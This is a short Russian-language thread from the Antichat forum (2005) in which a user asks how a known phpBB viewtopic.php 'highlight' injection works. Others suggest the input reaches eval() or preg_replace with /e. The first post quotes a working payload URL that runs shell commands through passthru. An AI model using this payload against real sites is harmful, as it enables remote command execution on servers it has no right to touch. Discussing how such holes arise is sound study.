ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHP-injection (phpbb)
  #1  
Старый 06.08.2005, 00:06
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию PHP-injection (phpbb)

Код:
viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Мне стало интересно где/как происходит иньекция, но просмотрев исходники я так и не понял как это происходит=(((, просьба к грамотным людям подсказать

viewtopic.php
 
Ответить с цитированием

  #2  
Старый 06.08.2005, 02:57
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

СекЛаб почитай,там описывается...
 
Ответить с цитированием

  #3  
Старый 06.08.2005, 12:28
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

ok, Спасибо
закрывайте тему
 
Ответить с цитированием

  #4  
Старый 06.08.2005, 12:32
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

Я не смотрел в код, но похоже, что значение highlight или то что от него осталось после неких операций над ним скрипта, заносится в eval(); или в preg_replace() с модификатором /e
 
Ответить с цитированием

  #5  
Старый 06.08.2005, 16:47
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Вроде это и написано на секлабе
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Использование бага PHP source injection k00p3r Чужие Статьи 0 13.06.2005 14:16
PHP Injection :: Возможно все! k00p3r Чужие Статьи 0 13.06.2005 14:10
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit madnet Мировые новости 3 16.03.2005 23:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ